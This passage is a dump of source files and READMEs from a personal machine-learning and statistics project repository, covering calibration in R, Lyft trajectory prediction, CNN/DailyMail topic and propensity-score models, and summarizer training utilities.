newX, type = \"prob\"))\n colnames(prob_df)[names(prob_df) == pos_label] <- 'positive'\n prob <- prob_df$positive\n\n }\n\n prob\n\n }\n\n if (ntimes > 1) {\n # obtain median and variance of the probabilities, use 1 / variance as the weight\n # return the n*2 array to the outer foreach\n cbind(apply(probs, 1, median), 1/apply(probs, 1, var))\n } else {\n probs\n }\n\n }\n\n stopCluster(cl)\n\n if (ntimes > 1) {\n\n # wprobs is three-dim array of size: n*2*nbags\n P <- wprobs[, 1, ] # probabilities\n W <- wprobs[, 2, ] # weights\n # return weighted average of probabilities\n return (rowMeans(P * (W / rowMeans(W)) ))\n\n } else {\n\n # return simple average of probabilities\n return (rowMeans(wprobs))\n\n }\n\n}\n\n\n" }, { "alpha_fraction": 0.7561349868774414, "alphanum_fraction": 0.7914110422134399, "avg_line_length": 86, "blob_id": "eea3e8c799a35ca9e46f84746dc00e69dcbd0a11", "content_id": "9c3722b0e88cf61dad3b910009ce225c9dd6d2b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1304, "license_type": "no_license", "max_line_length": 335, "num_lines": 15, "path": "/MinneMUDAC/notebooks/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "## MinneMUDAC 2019\n\nThis repository contains part of the code I have written for the MinneMUDAC project and the presentation slides of our talks. \n\n`spider.ipynb` crawls futures price data from https://www.mrci.com/ohlc/index.php. Note that there are some duplicate data. For example, data from [20161230](https://www.mrci.com/ohlc/2016/161230.php) is the same as [20170102](https://www.mrci.com/ohlc/2017/170102.php). Need to remove the duplicated values in preprocessing procedure.\n\n`last-week-pred.ipynb` uses the last week as validation and make predictions on the last week.\n\n`next-week.ipynb` makes predictions for the desired upcoming week.\n\n`tweet.ipynb` deals with tweet data. It uses LDA model to cluster tweet topics and thus obtains trade relavant and economy relavant tweets. Trump's tweet data is from http://www.trumptwitterarchive.com/archive. The result is shown in `tweetLDA11.html`.\n\n`feature-importance.ipynb` runs models on the stationarized data. Models include linear model, ridge regression, lasso regression, and XGBoost. Also, SHAP is used to interpret XGBoost model.\n\n`ts-modeling.ipynb` tries time series modeling. It is mostly based on [mlcourse.ai](https://github.com/Yorko/mlcourse.ai/blob/master/jupyter_english/topic09_time_series/topic9_part1_time_series_python.ipynb)." }, { "alpha_fraction": 0.6019288301467896, "alphanum_fraction": 0.6197206377983093, "avg_line_length": 32.41666793823242, "blob_id": "fb4b3d546636f5cd11d1954ce7ed0310cf02e844", "content_id": "53ce95f26d54486d0655d07f1854fad4432fe09f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6014, "license_type": "no_license", "max_line_length": 130, "num_lines": 180, "path": "/lyft/pred.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "from typing import Dict\n\nfrom tempfile import gettempdir\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom torch import nn, optim\nfrom torch.utils.data import DataLoader\nfrom torchvision.models.resnet import resnet50, resnet18, resnet34, resnet101\nfrom efficientnet_pytorch import EfficientNet\nfrom tqdm import tqdm\n\nimport l5kit\nfrom l5kit.configs import load_config_data\nfrom l5kit.data import LocalDataManager, ChunkedDataset\nfrom l5kit.dataset import AgentDataset, EgoDataset\nfrom l5kit.rasterization import build_rasterizer\nfrom l5kit.evaluation import write_pred_csv, compute_metrics_csv, read_gt_csv, create_chopped_dataset\nfrom l5kit.evaluation.chop_dataset import MIN_FUTURE_STEPS\nfrom l5kit.evaluation.metrics import neg_multi_log_likelihood, time_displace\nfrom l5kit.geometry import transform_points\nfrom l5kit.visualization import PREDICTED_POINTS_COLOR, TARGET_POINTS_COLOR, draw_trajectory\nfrom prettytable import PrettyTable\nfrom pathlib import Path\n\nimport matplotlib.pyplot as plt\n\nimport os\nimport random\nimport time\nfrom json import dumps\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport utils\nfrom models import LyftEffnet, LyftEffnetb7, LyftDensenet\nfrom utils import forward\n\n### =============== Configurations ============= ###\ncfg = {\n 'format_version': 4,\n 'data_path': \"input/lyft-motion-prediction-autonomous-vehicles\",\n 'save_dir': \"./save/\",\n 'name': 'effnetb7',\n 'gpu_ids': [6],\n 'seed': 2048, \n 'load_path': \"./save/train/effnetb7-07/best.pth.tar\", \n 'model_params': {\n # 'model_architecture': 'resnet50',\n 'history_num_frames': 10,\n 'history_step_size': 1,\n 'history_delta_time': 0.1,\n 'future_num_frames': 50,\n 'future_step_size': 1,\n 'future_delta_time': 0.1,\n 'model_name': \"effnetb4\",\n 'lr': 1e-4,\n 'train': False,\n 'predict': True,\n },\n\n 'raster_params': {\n 'raster_size': [224, 224],\n 'pixel_size': [0.5, 0.5],\n 'ego_center': [0.25, 0.5],\n 'map_type': 'py_semantic',\n 'satellite_map_key': 'aerial_map/aerial_map.png',\n 'semantic_map_key': 'semantic_map/semantic_map.pb',\n 'dataset_meta_key': 'meta.json',\n 'filter_agents_threshold': 0.5\n },\n\n 'train_data_loader': {\n 'key': 'scenes/train_full.zarr',\n 'batch_size': 64, # 16\n 'shuffle': True,\n 'num_workers': 16 # 4\n },\n \n 'val_data_loader': {\n 'dir': 'input/lyft-motion-prediction-autonomous-vehicles/scenes/validate_chopped_100',\n 'key': 'scenes/validate_chopped_100/validate.zarr',\n 'batch_size': 64,\n 'shuffle': False,\n 'num_workers': 16 # 4\n },\n\n 'test_data_loader': {\n 'key': 'scenes/test.zarr',\n 'batch_size': 64,\n 'shuffle': False,\n 'num_workers': 16 # 4\n },\n\n 'train_params': {\n 'max_num_steps': 12000000,\n 'eval_steps': 160000,\n 'max_grad_norm': 3.0,\n }\n}\n\n\ndef main(cfg):\n\n # set logger, tensorboard, and devices\n cfg['save_dir'] = utils.get_save_dir(cfg['save_dir'], cfg['name'], training=False)\n log = utils.get_logger(cfg[\"save_dir\"], cfg[\"name\"])\n device = utils.get_devices(cfg[\"gpu_ids\"])\n cfg[\"test_data_loader\"][\"batch_size\"] *= max(1, len(cfg[\"gpu_ids\"]))\n \n log.info(f\"Cfg: {dumps(cfg, indent = 4, sort_keys = True)}\")\n\n # get model\n log.info(\"Building model...\")\n model = utils.init_model(cfg)\n model = nn.DataParallel(model, device_ids=cfg[\"gpu_ids\"])\n log.info(f\"Loading checkpoint from {cfg['load_path']}...\")\n model = utils.load_model(model, cfg[\"load_path\"], cfg[\"gpu_ids\"], return_step=False)\n model = model.to(device)\n model.eval()\n\n # get dataloader\n DIR_INPUT = cfg[\"data_path\"]\n os.environ[\"L5KIT_DATA_FOLDER\"] = DIR_INPUT\n dm = LocalDataManager(None)\n\n log.info(\"Building testing dataset...\")\n test_cfg = cfg[\"test_data_loader\"]\n rasterizer = build_rasterizer(cfg, dm)\n test_zarr = ChunkedDataset(dm.require(test_cfg[\"key\"])).open()\n test_mask = np.load(f\"{DIR_INPUT}/scenes/mask.npz\")[\"arr_0\"]\n test_dataset = AgentDataset(cfg, test_zarr, rasterizer, agents_mask=test_mask)\n test_dataloader = DataLoader(test_dataset,shuffle=test_cfg[\"shuffle\"],batch_size=test_cfg[\"batch_size\"],\n num_workers=test_cfg[\"num_workers\"])\n log.info(str(test_dataset))\n\n # Predict\n log.info(\"Predicting...\")\n # store information for evaluation\n future_coords_offsets_pd = []\n timestamps = []\n confidences_list = []\n agent_ids = []\n\n progress_bar = tqdm(test_dataloader)\n\n with torch.no_grad():\n for data in progress_bar:\n\n _, preds, confidences, _ = forward(data, model, device)\n\n #fix for the new environment\n preds = preds.cpu().numpy()\n world_from_agents = data[\"world_from_agent\"].numpy()\n centroids = data[\"centroid\"].numpy()\n \n # convert into world coordinates and compute offsets\n for idx in range(len(preds)):\n for mode in range(3):\n preds[idx, mode, :, :] = transform_points(preds[idx, mode, :, :], world_from_agents[idx]) - centroids[idx][:2]\n \n future_coords_offsets_pd.append(preds.copy())\n confidences_list.append(confidences.cpu().numpy().copy()) \n timestamps.append(data[\"timestamp\"].numpy().copy()) \n agent_ids.append(data[\"track_id\"].numpy().copy()) \n\n\n # create submission to submit to Kaggle\n pred_path = os.path.join(cfg['save_dir'], \"pred.csv\")\n log.info(f\"Writing prediction to {pred_path}.\")\n write_pred_csv(pred_path,\n timestamps=np.concatenate(timestamps), \n track_ids=np.concatenate(agent_ids), \n coords=np.concatenate(future_coords_offsets_pd),\n confs = np.concatenate(confidences_list)\n )\n\nif __name__ == '__main__':\n main(cfg)" }, { "alpha_fraction": 0.7407407164573669, "alphanum_fraction": 0.7555555701255798, "avg_line_length": 30.153846740722656, "blob_id": "64e8814912ad1c8e130d60a58943bab5998cfbaf", "content_id": "a0b412fc7de551109bf3d02745c392294eddc725", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 810, "license_type": "no_license", "max_line_length": 118, "num_lines": 26, "path": "/Learning_Rate/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "## Learning Rate Decaying Scheme Investigation\n\nThis is a class project for IE 8521 (Optimization). \n\nThis project investigates the effect of learning rate updating schemes on the convergence time and model performance. \n\nTeam Members: Liwei Huang and Yu Yang.\n\n#### Detail of sequences we considered:\n- seq1: 1/n\n- seq2: 1/sqrt(n)\n- seq3: 0.9^n\n- seq4: cyclic\n\n#### Detail of strategies we considered:\n- by epoch: update parameters every epoch.\n- by cutoff: update parameters if the loss is smaller than certain cutoff.\n- by oscillate: update parameters every time the validation loss increases.\n\n#### Optimizers we considered:\n- SGD\n- Adam\n\n#### Comparison\n- For every strategy, compare four sequences and benchmark.\n- Pick the best combination of each sequence, and compare with SGD benchmark and Adam benchmark.\n" }, { "alpha_fraction": 0.5946771502494812, "alphanum_fraction": 0.5966404676437378, "avg_line_length": 39.89285659790039, "blob_id": "263282c16a018309fcb45de80690aad7395b2e5a", "content_id": "078937f55a3fe32e487932f7dd26059f3ea1cb58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4584, "license_type": "no_license", "max_line_length": 134, "num_lines": 112, "path": "/textual_causality/etm-ps/data_utils.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "from torch.utils.data import Dataset\nimport os\nimport json\nimport torch\nfrom transformers import RobertaTokenizer\nfrom collections import Counter\nimport logging\nlogging.getLogger(\"transformers.tokenization_utils\").setLevel(logging.ERROR)\n\nclass CNNDM(Dataset):\n def __init__(self, fdir, model_type, is_test=False, total_len=512, ps_path=None):\n \"\"\" data format: article, abstract, [(candidiate_i, score_i)] \n ps_path: the learned propensity score dictionary json file.\n \"\"\"\n self.fdir = fdir\n self.indices = self.get_valid_indices()\n self.num = len(self.indices)\n self.is_test = is_test\n self.total_len = total_len\n self.tok = RobertaTokenizer.from_pretrained(model_type, verbose=False)\n self.pad_token_id = self.tok.pad_token_id\n self.cls_token_id = self.tok.cls_token_id\n self.sep_token_id = self.tok.sep_token_id\n self.keywords = [\"government\", \"crime\", \"economy\", \"game\", \"health\"]\n self.ps_path = ps_path\n\n def __len__(self):\n return self.num\n\n def get_valid_indices(self):\n \"\"\"There are some stories in the training set that have empty articles, which \n will lead to NaNs in training process if not removed. (an example is train/589.json)\n \"\"\"\n valid_indices = []\n for idx in range(len(os.listdir(self.fdir))):\n with open(os.path.join(self.fdir, f\"{idx}.json\"), \"r\") as f:\n data = json.load(f)\n if data[\"article\"] and data[\"abstract\"]:\n valid_indices.append(idx)\n return valid_indices\n\n def bert_encode(self, x, get_counters=False):\n _ids = self.tok.encode(x, add_special_tokens=False, truncation=False)\n ids = [self.cls_token_id]\n ids.extend(_ids[:self.total_len - 2])\n ids.append(self.sep_token_id)\n if get_counters:\n cnt = Counter(_ids)\n return ids, cnt, _ids\n else:\n return ids, _ids\n\n def __getitem__(self, idx):\n with open(os.path.join(self.fdir, f\"{self.indices[idx]}.json\"), \"r\") as f:\n data = json.load(f)\n article = data[\"article\"]\n src_input_ids, src_counters, _src_input_ids = self.bert_encode(\" \".join(article), get_counters=True)\n src_input_len = len(_src_input_ids)\n src_keywords_inclusion = [1 * (w in \" \".join(article)) for w in self.keywords]\n src_keywords_inclusion_type = int(\"\".join([str(x) for x in src_keywords_inclusion]), 2) # convert a binary list into a number\n abstract = data[\"abstract\"]\n tgt_input_ids, _ = self.bert_encode(\" \".join(abstract), get_counters=False)\n text_id = self.indices[idx]\n result = {\n \"src_input_ids\": src_input_ids, \n \"tgt_input_ids\": tgt_input_ids, \n \"src_counters\": src_counters, \n \"src_input_len\": src_input_len, \n \"src_keywords_inclusion_type\": src_keywords_inclusion_type, \n \"text_id\": text_id\n }\n if self.is_test:\n result[\"text\"] = data\n if self.ps_path:\n pass\n return result\n\n def select(self, indices):\n self.num = len(indices)\n self.indices = indices\n return self\n\ndef collate_mp(examples, pad_token_id, vocab_size, is_test=False):\n def bert_pad(sents):\n max_len = max(len(sent) for sent in sents)\n result = []\n for sent in sents:\n if len(sent) < max_len:\n sent.extend([pad_token_id] * (max_len - len(sent)))\n result.append(sent)\n return torch.LongTensor(result)\n\n def get_bows(counters, vocab_size):\n return torch.IntTensor([[cnt[i] for i in range(vocab_size)] for cnt in counters])\n\n src_input_ids = bert_pad([x[\"src_input_ids\"] for x in examples])\n tgt_input_ids = bert_pad([x[\"tgt_input_ids\"] for x in examples])\n src_bows = get_bows([x[\"src_counters\"] for x in examples], vocab_size)\n src_input_lens = torch.LongTensor([x[\"src_input_len\"] for x in examples])\n src_keywords_inclusion_types = torch.IntTensor([x[\"src_keywords_inclusion_type\"] for x in examples])\n text_ids = [x[\"text_id\"] for x in examples]\n result = {\n \"src_input_ids\": src_input_ids, \n \"tgt_input_ids\": tgt_input_ids, \n \"src_bows\": src_bows, # (batch_size, vocab_size)\n \"src_input_lens\": src_input_lens, \n \"src_keywords_inclusion_types\": src_keywords_inclusion_types, \n \"text_ids\": text_ids\n }\n if is_test:\n result['text'] = [x[\"text\"] for x in examples]\n return result \n\n\n\n" }, { "alpha_fraction": 0.42424243688583374, "alphanum_fraction": 0.5353535413742065, "avg_line_length": 23.75, "blob_id": "5b113823db75d7101017191770e23ae9f1610026", "content_id": "ccb17db70071c14fad2dca76f397cdeab12c1599", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 99, "license_type": "no_license", "max_line_length": 36, "num_lines": 4, "path": "/textual_causality/etm-ps/run_ps2.sh", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "python ./run_ps2.py \\\n --name ps2 \\\n --gpu_ids 0 1 2 3\\\n 2>&1 | tee logs/train_ps2_01.log\n" }, { "alpha_fraction": 0.6878727674484253, "alphanum_fraction": 0.7007952332496643, "avg_line_length": 37.653846740722656, "blob_id": "3cba0b6ac23a89d600f14f84c25eed02c35a496a", "content_id": "ee755f8a3eb5d7df8257ed8827fcf9290c9e746f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 1006, "license_type": "no_license", "max_line_length": 165, "num_lines": 26, "path": "/imbCalib/package/imbCalib/R/imbalance-data.R", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "#' Synthesized imbalanced data\n#'\n#' Data with 8 covariates and 1 binary response. The ratio of positive vs. negative class\n#' is 5:95. The positive label is 1.\n#'\n#' @docType data\n#'\n#' @usage data(imbalance)\n#'\n#' @keywords datasets\n#'\n#' @references \\href{https://scikit-learn.org/stable/modules/generated/sklearn.datasets.make_classification.html}{sklearn.datasets.make_classification documentation}\n#'\n#' @source \\href{https://raw.githubusercontent.com/yuyang-yy/materials/master/code/synthesize.py}{Python code to generate the data}\n#'\n#' @examples\n#' data(imbalance)\n#' set.seed(123)\n#' split <- sample.split(imbalance$y, SplitRatio = 0.75)\n#' train_set <- subset(imbalance, split == TRUE)\n#' test_set <- subset(imbalance, split == FALSE)\n#' X.test <- subset(test_set, select = -y)\n#' y.test <- subset(test_set, select = y)[,1]\n#' bag.prob.svm <- bagCalibrate(train_set, X.test, 'y', model='svm', type = 'C-classification', kernel = 'linear')\n#' stratifiedBrier(y.test, bag.prob.svm)\n\"imbalance\"\n\n" }, { "alpha_fraction": 0.6874625086784363, "alphanum_fraction": 0.7000600099563599, "avg_line_length": 49.51515197753906, "blob_id": "af7f4a454c9e932407ec59b762954b64200616e7", "content_id": "d6583631ae3e0cbf6446c9eb4b88ce3bc5d60db2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1667, "license_type": "no_license", "max_line_length": 117, "num_lines": 33, "path": "/textual_causality/etm-ps/get_ps.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "\"\"\"This file is to get the propensity scores dictionary.\"\"\"\nfrom transformers import RobertaTokenizer\nfrom functools import partial\nfrom data_utils import collate_mp, CNNDM\nfrom torch.utils.data import DataLoader\nfrom collections import Counter, OrderedDict\nfrom tqdm import tqdm\nfrom json import dump\n\nif __name__ == \"__main__\":\n\n tok = RobertaTokenizer.from_pretrained(\"roberta-base\")\n train_dataset = CNNDM(f\"/home/yang6367/summarizer/cnn-dailymail/processed/train\", \"roberta-base\", is_test=False)\n collate_fn = partial(collate_mp, pad_token_id=tok.pad_token_id, vocab_size=tok.vocab_size, is_test=False)\n train_dataloader = DataLoader(train_dataset, batch_size=256, shuffle=False, num_workers=4, collate_fn=collate_fn)\n \n doc_len_threshold = 800\n counter0 = Counter() # shorter than threshold\n counter1 = Counter() # longer than threshold\n with tqdm(total=len(train_dataloader.dataset)) as progress_bar:\n for batch in train_dataloader:\n src_input_lens = batch[\"src_input_lens\"]\n src_keywords_inclusion_types = batch[\"src_keywords_inclusion_types\"]\n counter0.update(src_keywords_inclusion_types[src_input_lens <= doc_len_threshold].tolist())\n counter1.update(src_keywords_inclusion_types[src_input_lens > doc_len_threshold].tolist())\n \n progress_bar.update(src_input_lens.size(0))\n\n propensity_scores = OrderedDict() \n for key in sorted(set(counter0.keys()) | set(counter1.keys())):\n propensity_scores[key] = counter1[key] / (counter0[key] + counter1[key])\n with open('save/propensity_scores.json', 'w') as f:\n dump(propensity_scores, f)\n" }, { "alpha_fraction": 0.4577150344848633, "alphanum_fraction": 0.4660393297672272, "avg_line_length": 40.641414642333984, "blob_id": "a5bb7c40ed4141ffee17ecc996516c79f58ce6a2", "content_id": "3d4f550979668431d962d8a4d5904c3556be9223", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8289, "license_type": "no_license", "max_line_length": 105, "num_lines": 198, "path": "/textual_causality/etm-ps/args.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "\"\"\"Command-line arguments.\nAdapted from SQuAD code.\n\"\"\"\n\nimport argparse\n\ndef get_train_args():\n \"\"\"Get arguments needed in train.py.\"\"\"\n parser = argparse.ArgumentParser('Train a ETM on CNNDM')\n\n add_train_test_args(parser)\n add_etm_args(parser)\n add_psmodel_args(parser)\n\n parser.add_argument('--seed',\n type=int,\n default=224,\n help='Random seed for reproducibility.')\n parser.add_argument('--ema_decay',\n type=float,\n default=0.999,\n help='Decay rate for exponential moving average of parameters.')\n parser.add_argument('--max_checkpoints',\n type=int,\n default=10,\n help='Maximum number of checkpoints to keep on disk.')\n parser.add_argument('--metric_name',\n type=str,\n default='BCE',\n choices=('BCE', 'ACC'), \n help='Name of validation metric to determine best checkpoint.')\n parser.add_argument('--optimizer',\n type=str,\n default='adam',\n choices=('adam', 'adagrad', 'adadelta', 'rmsprop', 'asgd', 'sgd'),\n help='Optimizer used in training.')\n parser.add_argument('--eval_steps',\n type=int,\n default=50000,\n help='Number of steps between successive evaluations.')\n parser.add_argument('--num_epochs',\n type=int,\n default=5,\n help='Number of epochs for which to train. Negative means forever.')\n parser.add_argument('--max_grad_norm',\n type=float,\n default=5.0,\n help='Maximum gradient norm for gradient clipping.')\n parser.add_argument('--lr',\n type=float,\n default=0.02,\n help='Learning rate.')\n parser.add_argument('--l2_wd',\n type=float,\n default=1.2e-6,\n help='L2 weight decay.')\n parser.add_argument('--drop_prob',\n type=float,\n default=0.2,\n help='Probability of zeroing an activation in dropout layers.')\n\n args = parser.parse_args() # can only be added at the last parser round\n\n if args.metric_name in ('BCE'):\n # Best checkpoint is the one that minimizes negative log-likelihood\n args.maximize_metric = False\n elif args.metric_name in ('ACC'):\n args.maximize_metric = True\n else:\n raise ValueError(f'Unrecognized metric name: \"{args.metric_name}\"')\n\n return args\n\n\ndef get_test_args():\n \"\"\"Get arguments needed in test.py.\"\"\"\n parser = argparse.ArgumentParser('Test a trained PS model on CNNDM')\n\n print(\"Loading train_test args...\")\n add_train_test_args(parser)\n print(\"Loading etm args...\")\n add_etm_args(parser)\n print(\"Loading psmode args...\")\n add_psmodel_args(parser)\n print(\"Loding ps sim args...\")\n add_ps_sim_args(parser)\n\n parser.add_argument('--split',\n type=str,\n default='test',\n choices=('train', 'val', 'test'),\n help='Split to use for testing.')\n\n # Require ps_load_path and etm_load_pathfor test.py\n args = parser.parse_args()\n if not args.ps_load_path:\n raise argparse.ArgumentError('Missing required argument --ps_load_path')\n if not args.etm_load_path:\n raise argparse.ArgumentError('Missing required argument --etm_load_path')\n\n return args\n\n\ndef add_train_test_args(parser):\n \"\"\"Add arguments common to train.py and test.py\"\"\"\n parser.add_argument('--save_dir',\n type=str,\n default='./save/',\n help='Base directory for saving information.')\n parser.add_argument('--name',\n '-n',\n type=str,\n required=True,\n help='Name to identify the model.')\n parser.add_argument('--gpu_ids',\n nargs='+',\n type=int,\n default=0, \n required=True,\n help='GPU ids. (ex. 3 4 5 6)') \n parser.add_argument('--batch_size',\n type=int,\n default=256,\n help='Batch size per GPU. Scales automatically when \\\n multiple GPUs are available.')\n parser.add_argument('--data_dir',\n type=str,\n default='/home/yang6367/summarizer/cnn-dailymail/processed', \n help='The processed CNNDM data directory.')\n parser.add_argument('--num_workers',\n type=int,\n default=4,\n help='Number of sub-processes to use per data loader.')\n\n\ndef add_etm_args(parser):\n parser.add_argument('--model_type',\n type=str,\n default='roberta-base', \n help='The type of Roberta model.') \n parser.add_argument('--num_topics',\n type=int,\n default=300, # when larger than vi_nn_hidden_size, there will be nans\n help='Number of topics for the ETM.') \n parser.add_argument('--vi_nn_hidden_size',\n type=int,\n default=800, \n help='Hidden layer size in the VI Neural Networks.') \n parser.add_argument('--theta_act',\n type=str,\n default='relu',\n choices=('relu', 'rrelu', 'leakyrelu', 'elu', 'selu', 'glu', 'tanh', 'softplus'),\n help='Activation function in the VI Nerual Networks.') \n parser.add_argument('--enc_drop',\n type=float,\n default=0.0, \n help='Dropout rate for the Encoder.') \n parser.add_argument('--etm_load_path',\n type=str,\n default=\"/home/yang6367/summarizer/etm/save/train/etm-01/best.pth.tar\",\n help='The trained ETM checkpoint.') \n parser.add_argument('--bow_norm',\n type=int,\n default=1, \n help='Whether to normalize the BOWs.') \n\n\ndef add_psmodel_args(parser):\n parser.add_argument('--doc_len_threshold',\n type=int,\n default=800,\n help='The document length threshold for treatment assignment.') \n parser.add_argument('--ps_load_path',\n type=str,\n default=\"\",\n help='The trained PSNet checkpoint.') \n parser.add_argument('--sim_data_path',\n type=str,\n default=\"\",\n help='The trained PSNet checkpoint.') \n\ndef add_ps_sim_args(parser):\n parser.add_argument('--alpha',\n type=float,\n default=-0.25,\n help='Alpha parameter for simulation.') \n parser.add_argument('--beta',\n type=float,\n default=5.0,\n help='Beta parameter for simulation.') \n parser.add_argument('--gamma',\n type=float,\n default=-5.0,\n help='Gamma parameter for simulation.') \n parser.add_argument('--ps_path',\n type=str,\n default=\"/home/yang6367/text-causal/etm/save/propensity_scores.json\",\n help='True propensity score path.') " }, { "alpha_fraction": 0.7695035338401794, "alphanum_fraction": 0.7695035338401794, "avg_line_length": 46.16666793823242, "blob_id": "e640b937623e7832e112a5c1b3a3a9ba7d61cf0e", "content_id": "7b48a17677b4c5e3c473118df8aed5f989c578ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 282, "license_type": "no_license", "max_line_length": 132, "num_lines": 6, "path": "/textual_causality/ate/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# ATE Estimation\n\nThis folder contains the scripts for simulation and ATE estimation. \n\n- `ate.R` simulates the data under two schemes, one controlling the mean of response while the other controls the ground-truth ATE. \n- `sim_data.csv` is the data copied from the `etm-ps` folder." }, { "alpha_fraction": 0.745110809803009, "alphanum_fraction": 0.7777053713798523, "avg_line_length": 62.91666793823242, "blob_id": "7c36a0bf25ba84c28c6e2a6efd43f67ac62cb9fc", "content_id": "4ea351dd2519498ec10babfb697b60ccaf39bd8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1534, "license_type": "no_license", "max_line_length": 335, "num_lines": 24, "path": "/MinneMUDAC/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "## MinneMUDAC 2019 Student Data Science Challenge\n\n**Team Name**: Women in Math and Stats\n\n**Team Members**: Somyi Baek, Cora Crown, Sarah Milstein, Yu Yang\n\n**Advisor**: Prof. Gilad Lerman\n\nThis repository contains the key part of the code I have written for the MinneMUDAC project and the presentation slides of our talks.\n\n`MUDAC Fall2019.pdf` introduces the problem and requirements of this data challenge.\n\n`spider.ipynb` crawls futures price data from https://www.mrci.com/ohlc/index.php. Note that there are some duplicate data. For example, data from [20161230](https://www.mrci.com/ohlc/2016/161230.php) is the same as [20170102](https://www.mrci.com/ohlc/2017/170102.php). Need to remove the duplicated values in preprocessing procedure.\n\n`tweet.ipynb` deals with tweet data. It uses LDA model to cluster tweet topics and thus obtains trade relavant and economy relavant tweets. Trump's tweet data is from http://www.trumptwitterarchive.com/archive. The result is shown in `tweetLDA11.html`.\n\n\n`ts-modeling.ipynb` tries time series modeling. It is mostly based on [mlcourse.ai](https://github.com/Yorko/mlcourse.ai/blob/master/jupyter_english/topic09_time_series/topic9_part1_time_series_python.ipynb).\n\n`models.ipynb` runs models on the stationarized data. Models include linear model, ridge regression, lasso regression, and XGBoost. Also, SHAP is used to interpret XGBoost model.\n\n`last-week-pred.ipynb` uses the last week as validation and make predictions on the last week.\n\n`next-week.ipynb` makes predictions for the desired upcoming week.\n" }, { "alpha_fraction": 0.6944290995597839, "alphanum_fraction": 0.6996690630912781, "avg_line_length": 34.20388412475586, "blob_id": "57934871260bf5a874a2036ae4b1ea6cb982d7fd", "content_id": "e58db1152ff5b9148317db23b27efad4a1bc1ad6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3626, "license_type": "permissive", "max_line_length": 100, "num_lines": 103, "path": "/rbm_summarizer/training_ptr_gen/train_util.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "from torch.autograd import Variable\nimport numpy as np\nimport torch\nfrom data_util import config\nfrom data_util import utils\nfrom train_textRBM.textRBM import TextRBM\nimport torch\n\ndef get_input_from_batch(batch, use_cuda, device='cpu'):\n batch_size = len(batch.enc_lens)\n\n enc_batch = Variable(torch.from_numpy(batch.enc_batch).long())\n enc_padding_mask = Variable(torch.from_numpy(batch.enc_padding_mask)).float()\n enc_lens = Variable(torch.from_numpy(batch.enc_lens)).int()\n extra_zeros = None\n enc_batch_extend_vocab = None\n\n if config.pointer_gen:\n enc_batch_extend_vocab = Variable(torch.from_numpy(batch.enc_batch_extend_vocab).long())\n # max_art_oovs is the max over all the article oov list in the batch\n if batch.max_art_oovs > 0:\n extra_zeros = Variable(torch.zeros((batch_size, batch.max_art_oovs)))\n\n c_t_1 = Variable(torch.zeros((batch_size, 2 * config.hidden_dim)))\n\n coverage = None\n if config.is_coverage:\n coverage = Variable(torch.zeros(enc_batch.size()))\n\n if use_cuda:\n enc_batch = enc_batch.to(device)\n enc_padding_mask = enc_padding_mask.to(device)\n enc_lens = enc_lens.to(device)\n\n if enc_batch_extend_vocab is not None:\n enc_batch_extend_vocab = enc_batch_extend_vocab.to(device)\n if extra_zeros is not None:\n extra_zeros = extra_zeros.to(device)\n c_t_1 = c_t_1.to(device)\n\n if coverage is not None:\n coverage = coverage.to(device)\n\n return enc_batch, enc_padding_mask, enc_lens, enc_batch_extend_vocab, extra_zeros, c_t_1, coverage\n\ndef get_output_from_batch(batch, use_cuda, device='cpu'):\n dec_batch = Variable(torch.from_numpy(batch.dec_batch).long())\n dec_padding_mask = Variable(torch.from_numpy(batch.dec_padding_mask)).float()\n dec_lens = batch.dec_lens\n max_dec_len = np.max(dec_lens)\n dec_lens_var = Variable(torch.from_numpy(dec_lens)).float()\n\n target_batch = Variable(torch.from_numpy(batch.target_batch)).long()\n\n if use_cuda:\n dec_batch = dec_batch.to(device)\n dec_padding_mask = dec_padding_mask.to(device)\n dec_lens_var = dec_lens_var.to(device)\n target_batch = target_batch.to(device)\n\n\n return dec_batch, dec_padding_mask, max_dec_len, dec_lens_var, target_batch\n\n\ndef get_rbm_input_from_batch(batch, vocab, use_cuda, device):\n ## step 1: get the cleaned word list for each document\n # convert the indices to words\n docs = [[vocab.id2word(i) for i in doc_ids ]for doc_ids in batch.enc_batch.tolist()]\n # remove stopwords, meaningless words, and do lemmatization\n docs = [utils.lemmatize(utils.clean(doc)) for doc in docs]\n # filter out the words that are not in the top15k\n docs = [utils.keep_top15k(doc) for doc in docs]\n\n ## step 2: transform the word list into a word-count vector\n docs_word_count = [utils.get_word_count(doc) for doc in docs]\n # transform the list to a tensor\n docs_word_count = Variable(torch.Tensor(docs_word_count).int())\n # docs_lens = docs_word_count.sum(-1)\n \n if use_cuda:\n docs_word_count = docs_word_count.to(device)\n # docs_lens = docs_lens.to(device)\n \n return docs_word_count\n\n\n# load the trained rbm model\nckpt_dict = torch.load(config.rbm_ckpt_path, 